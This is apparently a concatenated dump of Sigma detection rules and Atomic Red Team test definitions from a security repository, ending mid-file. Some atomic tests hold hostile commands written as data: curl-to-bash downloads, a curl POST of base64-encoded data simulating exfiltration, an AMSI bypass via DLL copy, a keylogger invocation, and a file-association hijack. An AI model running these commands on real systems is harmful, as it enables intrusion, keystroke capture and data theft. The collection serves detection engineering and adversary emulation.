StoneDrill report by Kaspersky 4 | author: Florian Roth 5 | references: 6 | - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/ 7 | tags: 8 | - attack.persistence 9 | - attack.g0064 10 | - attack.t1050 11 | logsource: 12 | product: windows 13 | service: system 14 | detection: 15 | selection: 16 | EventID: 7045 17 | ServiceName: NtsSrv 18 | ServiceFileName: '* LocalService' 19 | condition: selection 20 | falsepositives: 21 | - Unlikely 22 | level: high 23 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_powershell_b64_shellcode.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell Base64 Encoded Shellcode 2 | id: 2d117e49-e626-4c7c-bd1f-c3c0147774c8 3 | description: Detects Base64 encoded Shellcode 4 | status: experimental 5 | references: 6 | - https://twitter.com/cyb3rops/status/1063072865992523776 7 | author: Florian Roth 8 | date: 2018/11/17 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1036 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection1: 17 | CommandLine: '*AAAAYInlM*' 18 | selection2: 19 | CommandLine: 20 | - '*OiCAAAAYInlM*' 21 | - '*OiJAAAAYInlM*' 22 | condition: selection1 and selection2 23 | falsepositives: 24 | - Unknown 25 | level: critical 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_rare_service_installs.yml: -------------------------------------------------------------------------------- 1 | title: Rare Service Installs 2 | id: 66bfef30-22a5-4fcd-ad44-8d81e60922ae 3 | description: Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious 4 | services 5 | status: experimental 6 | author: Florian Roth 7 | tags: 8 | - attack.persistence 9 | - attack.privilege_escalation 10 | - attack.t1050 11 | - car.2013-09-005 12 | logsource: 13 | product: windows 14 | service: system 15 | detection: 16 | selection: 17 | EventID: 7045 18 | timeframe: 7d 19 | condition: selection | count() by ServiceFileName < 5 20 | falsepositives: 21 | - Software installation 22 | - Software updates 23 | level: low -------------------------------------------------------------------------------- /elemental/media/atomics/T1042.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1042 3 | display_name: Change Default File Association 4 | 5 | atomic_tests: 6 | - name: Change Default File Association 7 | description: | 8 | Change Default File Association From cmd.exe 9 | 10 | supported_platforms: 11 | - windows 12 | input_arguments: 13 | extension_to_change: 14 | description: File Extension To Hijack 15 | type: String 16 | default: .wav 17 | target_exenstion_handler: 18 | description: Thing To Open 19 | type: Path 20 | default: C:\Program Files\Windows Media Player\wmplayer.exe 21 | executor: 22 | name: command_prompt 23 | elevation_required: false 24 | command: | 25 | cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_hurricane_panda.yml: -------------------------------------------------------------------------------- 1 | title: Hurricane Panda Activity 2 | id: 0eb2107b-a596-422e-b123-b389d5594ed7 3 | author: Florian Roth 4 | status: experimental 5 | description: Detects Hurricane Panda Activity 6 | references: 7 | - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ 8 | tags: 9 | - attack.privilege_escalation 10 | - attack.g0009 11 | - attack.t1068 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine: 18 | - '* localgroup administrators admin /add' 19 | - '*\Win64.exe*' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_csc.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Parent of Csc.exe 2 | id: b730a276-6b63-41b8-bcf8-55930c8fc6ee 3 | description: Detects a suspicious parent of csc.exe, which could by a sign of payload delivery 4 | status: experimental 5 | references: 6 | - https://twitter.com/SBousseaden/status/1094924091256176641 7 | author: Florian Roth 8 | date: 2019/02/11 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1036 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | Image: '*\csc.exe*' 18 | ParentImage: 19 | - '*\wscript.exe' 20 | - '*\cscript.exe' 21 | - '*\mshta.exe' 22 | condition: selection 23 | falsepositives: 24 | - Unkown 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_vul_java_remote_debugging.yml: -------------------------------------------------------------------------------- 1 | title: Java Running with Remote Debugging 2 | id: 8f88e3f6-2a49-48f5-a5c4-2f7eedf78710 3 | description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect 4 | author: Florian Roth 5 | tags: 6 | - attack.discovery 7 | - attack.t1046 8 | logsource: 9 | category: process_creation 10 | product: windows 11 | detection: 12 | selection: 13 | CommandLine: '*transport=dt_socket,address=*' 14 | exclusion: 15 | - CommandLine: '*address=127.0.0.1*' 16 | - CommandLine: '*address=localhost*' 17 | condition: selection and not exclusion 18 | fields: 19 | - CommandLine 20 | - ParentCommandLine 21 | falsepositives: 22 | - unknown 23 | level: medium 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_win10_sched_task_0day.yml: -------------------------------------------------------------------------------- 1 | title: Windows 10 scheduled task SandboxEscaper 0-day 2 | id: 931b6802-d6a6-4267-9ffa-526f57f22aaf 3 | status: experimental 4 | description: Detects Task Scheduler .job import arbitrary DACL write\par 5 | references: 6 | - https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe 7 | author: Olaf Hartong 8 | date: 2019/05/22 9 | logsource: 10 | category: process_creation 11 | product: windows 12 | detection: 13 | selection: 14 | Image: schtasks.exe 15 | CommandLine: '*/change*/TN*/RU*/RP*' 16 | condition: selection 17 | falsepositives: 18 | - Unknown 19 | tags: 20 | - attack.privilege_escalation 21 | - attack.execution 22 | - attack.t1053 23 | - car.2013-08-001 24 | level: high 25 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1073.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1073 3 | display_name: DLL Side-Loading 4 | 5 | atomic_tests: 6 | - name: DLL Side-Loading using the Notepad++ GUP.exe binary 7 | description: | 8 | GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | process_name: 15 | description: Name of the created process 16 | type: string 17 | default: calculator.exe 18 | 19 | executor: 20 | name: command_prompt 21 | elevation_required: false 22 | command: | 23 | $PathToAtomicsFolder\T1073\bin\GUP.exe 24 | cleanup_command: | 25 | taskkill /F /IM #{process_name} -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_apt29_thinktanks.yml: -------------------------------------------------------------------------------- 1 | title: APT29 2 | id: 033fe7d6-66d1-4240-ac6b-28908009c71f 3 | description: This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks 4 | references: 5 | - https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ 6 | tags: 7 | - attack.execution 8 | - attack.g0016 9 | - attack.t1086 10 | author: Florian Roth 11 | date: 2018/12/04 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine: '*-noni -ep bypass $*' 18 | condition: selection 19 | falsepositives: 20 | - unknown 21 | level: critical 22 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_wmi_persistence_commandline_event_consumer.yml: -------------------------------------------------------------------------------- 1 | title: WMI Persistence - Command Line Event Consumer 2 | id: 05936ce2-ee05-4dae-9d03-9a391cf2d2c6 3 | status: experimental 4 | description: Detects WMI command line event consumers 5 | references: 6 | - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ 7 | author: Thomas Patzke 8 | date: 2018/03/07 9 | tags: 10 | - attack.t1084 11 | - attack.persistence 12 | logsource: 13 | product: windows 14 | service: sysmon 15 | detection: 16 | selection: 17 | EventID: 7 18 | Image: 'C:\Windows\System32\wbem\WmiPrvSE.exe' 19 | ImageLoaded: 'wbemcons.dll' 20 | condition: selection 21 | falsepositives: 22 | - Unknown (data set is too small; further testing needed) 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_mavinject_proc_inj.yml: -------------------------------------------------------------------------------- 1 | title: MavInject Process Injection 2 | id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 3 | status: experimental 4 | description: Detects process injection using the signed Windows tool Mavinject32.exe 5 | references: 6 | - https://twitter.com/gN3mes1s/status/941315826107510784 7 | - https://reaqta.com/2017/12/mavinject-microsoft-injector/ 8 | - https://twitter.com/Hexacorn/status/776122138063409152 9 | author: Florian Roth 10 | date: 2018/12/12 11 | tags: 12 | - attack.t1055 13 | - attack.t1218 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection: 19 | CommandLine: '* /INJECTRUNNING *' 20 | condition: selection 21 | falsepositives: 22 | - unknown 23 | level: critical 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_netsh_port_fwd.yml: -------------------------------------------------------------------------------- 1 | title: Netsh Port Forwarding 2 | id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614 3 | description: Detects netsh commands that configure a port forwarding 4 | references: 5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html 6 | date: 2019/01/29 7 | tags: 8 | - attack.lateral_movement 9 | - attack.command_and_control 10 | - attack.t1090 11 | status: experimental 12 | author: Florian Roth 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | CommandLine: 19 | - netsh interface portproxy add v4tov4 * 20 | condition: selection 21 | falsepositives: 22 | - Legitimate administration 23 | level: medium 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_backup_delete.yml: -------------------------------------------------------------------------------- 1 | title: Backup Catalog Deleted 2 | id: 9703792d-fd9a-456d-a672-ff92efe4806a 3 | status: experimental 4 | description: Detects backup catalog deletions 5 | references: 6 | - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx 7 | - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 8 | author: Florian Roth (rule), Tom U. @c_APT_ure (collection) 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1107 12 | logsource: 13 | product: windows 14 | service: application 15 | detection: 16 | selection: 17 | EventID: 524 18 | Source: Backup 19 | condition: selection 20 | falsepositives: 21 | - Unknown 22 | level: medium 23 | 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_dsrm_password_change.yml: -------------------------------------------------------------------------------- 1 | title: Password Change on Directory Service Restore Mode (DSRM) Account 2 | id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51 3 | status: stable 4 | description: The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence. 5 | references: 6 | - https://adsecurity.org/?p=1714 7 | author: Thomas Patzke 8 | tags: 9 | - attack.persistence 10 | - attack.privilege_escalation 11 | - attack.t1098 12 | logsource: 13 | product: windows 14 | service: security 15 | detection: 16 | selection: 17 | EventID: 4794 18 | condition: selection 19 | falsepositives: 20 | - Initial installation of a domain controller 21 | level: high 22 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1132.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1132 3 | display_name: Data Encoding 4 | 5 | atomic_tests: 6 | - name: Base64 Encoded data. 7 | description: | 8 | Utilizing a common technique for posting base64 encoded data. 9 | 10 | supported_platforms: 11 | - macos 12 | - linux 13 | 14 | input_arguments: 15 | destination_url: 16 | description: Destination URL to post encoded data. 17 | type: string 18 | default: redcanary.com 19 | base64_data: 20 | description: Encoded data to post using fake Social Security number 111-11-1111. 21 | type: string 22 | default: MTExLTExLTExMTE= 23 | 24 | executor: 25 | name: sh 26 | command: | 27 | echo -n 111-11-1111 | base64 28 | curl -XPOST #{base64_data}.#{destination_url} 29 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_control_panel_item.yml: -------------------------------------------------------------------------------- 1 | title: Control Panel Items 2 | id: 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4 3 | status: experimental 4 | description: Detects the use of a control panel item (.cpl) outside of the System32 folder 5 | reference: 6 | - https://attack.mitre.org/techniques/T1196/ 7 | tags: 8 | - attack.execution 9 | - attack.t1196 10 | - attack.defense_evasion 11 | author: Kyaw Min Thein 12 | date: 2019/08/27 13 | level: critical 14 | logsource: 15 | product: windows 16 | category: process_creation 17 | detection: 18 | selection: 19 | CommandLine: '*.cpl' 20 | filter: 21 | CommandLine: 22 | - '*\System32\\*' 23 | - '*%System%*' 24 | condition: selection and not filter 25 | falsepositives: 26 | - Unknown 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_netsh_port_fwd_3389.yml: -------------------------------------------------------------------------------- 1 | title: Netsh RDP Port Forwarding 2 | id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 3 | description: Detects netsh commands that configure a port forwarding of port 3389 used for RDP 4 | references: 5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html 6 | date: 2019/01/29 7 | tags: 8 | - attack.lateral_movement 9 | - attack.t1021 10 | - car.2013-07-002 11 | status: experimental 12 | author: Florian Roth 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | CommandLine: 19 | - netsh i* p*=3389 c* 20 | condition: selection 21 | falsepositives: 22 | - Legitimate administration 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_uac_bypass_sdclt.yml: -------------------------------------------------------------------------------- 1 | title: UAC Bypass via sdclt 2 | id: 5b872a46-3b90-45c1-8419-f675db8053aa 3 | status: experimental 4 | description: Detects changes to HKCU:\Software\Classes\exefile\shell\runas\command\isolatedCommand 5 | references: 6 | - https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/ 7 | author: Omer Yampel 8 | logsource: 9 | product: windows 10 | service: sysmon 11 | detection: 12 | selection: 13 | EventID: 13 14 | TargetObject: 'HKEY_USERS\\*\Classes\exefile\shell\runas\command\isolatedCommand' 15 | condition: selection 16 | tags: 17 | - attack.defense_evasion 18 | - attack.privilege_escalation 19 | - attack.t1088 20 | - car.2019-04-001 21 | falsepositives: 22 | - unknown 23 | level: high 24 | 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_sdbinst_shim_persistence.yml: -------------------------------------------------------------------------------- 1 | title: Possible Shim Database Persistence via sdbinst.exe 2 | id: 517490a7-115a-48c6-8862-1a481504d5a8 3 | status: experimental 4 | description: Detects installation of a new shim using sdbinst.exe. A shim can be used to load malicious DLLs into applications. 5 | references: 6 | - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html 7 | tags: 8 | - attack.persistence 9 | - attack.t1138 10 | author: Markus Neis 11 | logsource: 12 | category: process_creation 13 | product: windows 14 | detection: 15 | selection: 16 | Image: 17 | - '*\sdbinst.exe' 18 | CommandLine: 19 | - '*.sdb*' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_taskmgr_parent.yml: -------------------------------------------------------------------------------- 1 | title: Taskmgr as Parent 2 | id: 3d7679bd-0c00-440c-97b0-3f204273e6c7 3 | status: experimental 4 | description: Detects the creation of a process from Windows task manager 5 | tags: 6 | - attack.defense_evasion 7 | - attack.t1036 8 | author: Florian Roth 9 | date: 2018/03/13 10 | logsource: 11 | category: process_creation 12 | product: windows 13 | detection: 14 | selection: 15 | ParentImage: '*\taskmgr.exe' 16 | filter: 17 | Image: 18 | - '*\resmon.exe' 19 | - '*\mmc.exe' 20 | - '*\taskmgr.exe' 21 | condition: selection and not filter 22 | fields: 23 | - Image 24 | - CommandLine 25 | - ParentCommandLine 26 | falsepositives: 27 | - Administrative activity 28 | level: low 29 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1038.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1038 3 | display_name: DLL Search Order Hijacking 4 | 5 | atomic_tests: 6 | - name: DLL Search Order Hijacking - amsi.dll 7 | description: | 8 | Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version 9 | of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) 10 | https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ 11 | 12 | supported_platforms: 13 | - windows 14 | 15 | executor: 16 | name: command_prompt 17 | elevation_required: false 18 | command: | 19 | copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe 20 | copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll 21 | cmd.exe /k %APPDATA%\updater.exe 22 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1056.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1056 3 | display_name: Input Capture 4 | 5 | atomic_tests: 6 | - name: Input Capture 7 | description: | 8 | Utilize PowerShell and external resource to capture keystrokes 9 | [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1) 10 | Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) 11 | 12 | supported_platforms: 13 | - windows 14 | 15 | input_arguments: 16 | filepath: 17 | description: Name of the local file, include path. 18 | type: Path 19 | default: c:\key.log 20 | 21 | executor: 22 | name: powershell 23 | command: | 24 | $PathToAtomicsFolder\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath} 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_ntfs_ads_access.yml: -------------------------------------------------------------------------------- 1 | title: NTFS Alternate Data Stream 2 | id: 8c521530-5169-495d-a199-0a3a881ad24e 3 | status: experimental 4 | description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. 5 | references: 6 | - http://www.powertheshell.com/ntfsstreams/ 7 | tags: 8 | - attack.defense_evasion 9 | - attack.t1096 10 | author: Sami Ruohonen 11 | logsource: 12 | product: windows 13 | service: powershell 14 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' 15 | detection: 16 | keyword1: 17 | - "set-content" 18 | keyword2: 19 | - "-stream" 20 | condition: keyword1 and keyword2 21 | falsepositives: 22 | - unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/apt_tropictrooper.yml: -------------------------------------------------------------------------------- 1 | title: TropicTrooper Campaign November 2018 2 | id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79 3 | author: '@41thexplorer, Windows Defender ATP' 4 | status: stable 5 | description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia 6 | references: 7 | - https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/ 8 | tags: 9 | - attack.execution 10 | - attack.t1085 11 | logsource: 12 | category: process_creation 13 | product: windows 14 | detection: 15 | selection: 16 | CommandLine: '*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*' 17 | condition: selection 18 | level: high -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_eventlog_cleared.yml: -------------------------------------------------------------------------------- 1 | title: Eventlog Cleared 2 | id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 3 | description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution 4 | references: 5 | - https://twitter.com/deviouspolack/status/832535435960209408 6 | - https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100 7 | author: Florian Roth 8 | tags: 9 | - attack.defense_evasion 10 | - attack.t1070 11 | - car.2016-04-002 12 | logsource: 13 | product: windows 14 | service: system 15 | detection: 16 | selection: 17 | EventID: 104 18 | Source: Microsoft-Windows-Eventlog 19 | condition: selection 20 | falsepositives: 21 | - Unknown 22 | level: medium 23 | 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/net_susp_dns_txt_exec_strings.yml: -------------------------------------------------------------------------------- 1 | title: DNS TXT Answer with possible execution strings 2 | id: 8ae51330-899c-4641-8125-e39f2e07da72 3 | status: experimental 4 | description: Detects strings used in command execution in DNS TXT Answer 5 | references: 6 | - https://twitter.com/stvemillertime/status/1024707932447854592 7 | - https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1 8 | tags: 9 | - attack.t1071 10 | author: Markus Neis 11 | date: 2018/08/08 12 | logsource: 13 | category: dns 14 | detection: 15 | selection: 16 | record_type: 'TXT' 17 | answer: 18 | - '*IEX*' 19 | - '*Invoke-Expression*' 20 | - '*cmd.exe*' 21 | condition: selection 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_apt_bluemashroom.yml: -------------------------------------------------------------------------------- 1 | title: BlueMashroom DLL Load 2 | id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0 3 | status: experimental 4 | description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report 5 | references: 6 | - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software 7 | tags: 8 | - attack.defense_evasion 9 | - attack.t1117 10 | author: Florian Roth 11 | date: 2019/10/02 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | CommandLine: 18 | - '*\regsvr32*\AppData\Local\\*' 19 | - '*\AppData\Local\\*,DllEntry*' 20 | condition: selection 21 | falsepositives: 22 | - Unlikely 23 | level: critical 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_sysvol_access.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious SYSVOL Domain Group Policy Access 2 | id: 05f3c945-dcc8-4393-9f3d-af65077a8f86 3 | status: experimental 4 | description: Detects Access to Domain Group Policies stored in SYSVOL 5 | references: 6 | - https://adsecurity.org/?p=2288 7 | - https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100 8 | author: Markus Neis 9 | date: 2018/04/09 10 | modified: 2018/12/11 11 | tags: 12 | - attack.credential_access 13 | - attack.t1003 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection: 19 | CommandLine: '*\SYSVOL\\*\policies\\*' 20 | condition: selection 21 | falsepositives: 22 | - administrative activity 23 | level: medium 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/sysmon_susp_powershell_rundll32.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell Rundll32 Remote Thread Creation 2 | id: 99b97608-3e21-4bfe-8217-2a127c396a0e 3 | status: experimental 4 | description: Detects PowerShell remote thread creation in Rundll32.exe 5 | author: Florian Roth 6 | references: 7 | - https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html 8 | date: 2018/06/25 9 | logsource: 10 | product: windows 11 | service: sysmon 12 | detection: 13 | selection: 14 | EventID: 8 15 | SourceImage: '*\powershell.exe' 16 | TargetImage: '*\rundll32.exe' 17 | condition: selection 18 | tags: 19 | - attack.defense_evasion 20 | - attack.execution 21 | - attack.t1085 22 | - attack.t1086 23 | falsepositives: 24 | - Unkown 25 | level: high 26 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_mal_ursnif.yml: -------------------------------------------------------------------------------- 1 | title: Ursnif 2 | id: 21f17060-b282-4249-ade0-589ea3591558 3 | status: experimental 4 | description: Detects new registry key created by Ursnif malware. 5 | references: 6 | - https://blog.yoroi.company/research/ursnif-long-live-the-steganography/ 7 | - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/ 8 | tags: 9 | - attack.execution 10 | - attack.t1112 11 | author: megan201296 12 | date: 2019/02/13 13 | logsource: 14 | product: windows 15 | service: sysmon 16 | detection: 17 | selection: 18 | EventID: 13 19 | TargetObject: '*\Software\AppDataLow\Software\Microsoft\\*' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: critical 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_rdp_bluekeep_poc_scanner.yml: -------------------------------------------------------------------------------- 1 | title: Scanner PoC for CVE-2019-0708 RDP RCE vuln 2 | id: 8400629e-79a9-4737-b387-5db940ab2367 3 | description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep 4 | references: 5 | - https://twitter.com/AdamTheAnalyst/status/1134394070045003776 6 | - https://github.com/zerosum0x0/CVE-2019-0708 7 | tags: 8 | - attack.lateral_movement 9 | - attack.t1210 10 | - car.2013-07-002 11 | author: Florian Roth (rule), Adam Bradbury (idea) 12 | date: 2019/06/02 13 | logsource: 14 | product: windows 15 | service: security 16 | detection: 17 | selection: 18 | EventID: 4625 19 | AccountName: AAAAAAA 20 | condition: selection 21 | falsepositives: 22 | - Unlikely 23 | level: critical 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_tscon_localsystem.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious TSCON Start 2 | id: 9847f263-4a81-424f-970c-875dab15b79b 3 | status: experimental 4 | description: Detects a tscon.exe start as LOCAL SYSTEM 5 | references: 6 | - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html 7 | - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6 8 | author: Florian Roth 9 | date: 2018/03/17 10 | tags: 11 | - attack.command_and_control 12 | - attack.t1219 13 | logsource: 14 | category: process_creation 15 | product: windows 16 | detection: 17 | selection: 18 | User: NT AUTHORITY\SYSTEM 19 | Image: '*\tscon.exe' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: high 24 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_msiexec_cwd.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious MsiExec Directory 2 | id: e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144 3 | status: experimental 4 | description: Detects suspicious msiexec process starts in an uncommon directory 5 | references: 6 | - https://twitter.com/200_okay_/status/1194765831911215104 7 | tags: 8 | - attack.defense_evasion 9 | - attack.t1036 10 | author: Florian Roth 11 | date: 2019/11/14 12 | logsource: 13 | category: process_creation 14 | product: windows 15 | detection: 16 | selection: 17 | Image: '*\msiexec.exe' 18 | filter: 19 | Image: 20 | - 'C:\Windows\System32\\*' 21 | - 'C:\Windows\SysWOW64\\*' 22 | - 'C:\Windows\WinSxS\\*' 23 | condition: selection and not filter 24 | falsepositives: 25 | - Unknown 26 | level: high 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/powershell_prompt_credentials.yml: -------------------------------------------------------------------------------- 1 | title: PowerShell Credential Prompt 2 | id: ca8b77a9-d499-4095-b793-5d5f330d450e 3 | status: experimental 4 | description: Detects PowerShell calling a credential prompt 5 | references: 6 | - https://twitter.com/JohnLaTwC/status/850381440629981184 7 | - https://t.co/ezOTGy1a1G 8 | tags: 9 | - attack.execution 10 | - attack.credential_access 11 | - attack.t1086 12 | author: John Lambert (idea), Florian Roth (rule) 13 | logsource: 14 | product: windows 15 | service: powershell 16 | definition: 'Script block logging must be enabled' 17 | detection: 18 | selection: 19 | EventID: 4104 20 | keyword: 21 | Message: 22 | - '*PromptForCredential*' 23 | condition: all of them 24 | falsepositives: 25 | - Unknown 26 | level: high 27 | -------------------------------------------------------------------------------- /elemental/media/sigma_rules/win_susp_bcdedit.yml: -------------------------------------------------------------------------------- 1 | title: Possible Ransomware or unauthorized MBR modifications 2 | id: c9fbe8e9-119d-40a6-9b59-dd58a5d84429 3 | status: experimental 4 | description: Detects, possibly, malicious unauthorized usage of bcdedit.exe 5 | references: 6 | - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set 7 | author: '@neu5ron' 8 | date: 2019/02/07 9 | tags: 10 | - attack.defense_evasion 11 | - attack.t1070 12 | - attack.persistence 13 | - attack.t1067 14 | logsource: 15 | category: process_creation 16 | product: windows 17 | detection: 18 | selection: 19 | NewProcessName: '*\bcdedit.exe' 20 | ProcessCommandLine: 21 | - '*delete*' 22 | - '*deletevalue*' 23 | - '*import*' 24 | condition: selection 25 | level: medium 26 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1059.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1059 3 | display_name: Command-Line Interface 4 | 5 | atomic_tests: 6 | - name: Command-Line Interface 7 | description: | 8 | Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. 9 | 10 | This will download the specified payload and set a marker file in `/tmp/art-fish.txt`. 11 | 12 | supported_platforms: 13 | - macos 14 | - centos 15 | - ubuntu 16 | - linux 17 | 18 | executor: 19 | name: sh 20 | command: | 21 | bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash" 22 | bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash" 23 | -------------------------------------------------------------------------------- /elemental/media/atomics/T1134.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1134 3 | display_name: Access Token Manipulation 4 | 5 | atomic_tests: 6 | - name: Access Token Manipulation 7 | description: | 8 | Creates a process as another user 9 | 